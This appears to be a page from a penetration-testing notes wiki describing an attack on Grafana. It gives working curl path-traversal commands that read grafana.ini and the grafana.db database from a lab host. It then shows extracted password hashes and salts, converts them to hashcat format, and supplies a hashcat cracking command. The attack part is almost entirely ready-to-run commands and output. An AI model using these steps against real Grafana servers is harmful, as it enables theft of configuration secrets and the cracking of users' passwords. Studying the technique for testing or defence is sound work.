Grafana

Grafana configuration files

/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db

Grafana LFI

curl --path-as-is  http://10.10.69.90:3000/public/plugins/mssql/../../../../../../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is  http://10.10.69.90:3000/public/plugins/mssql/../../../../../../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

Convert Grafana hashes to Hashcat's PBKDF2_HMAC_SHA256 format.

grafana2hashcat/grafana2hashcat.py at main · iamaldi/grafana2hashcatGitHub

❯ cat hashes
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl

❯ python3 Decrypt.py hashes

[+] Grafana2Hashcat
[+] Reading Grafana hashes from:  hashes
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.

sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=


[+] Now, you can run Hashcat with the following command, for example:

hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt

PreviousWebLogic NextUmbraco

Last updated 4 months ago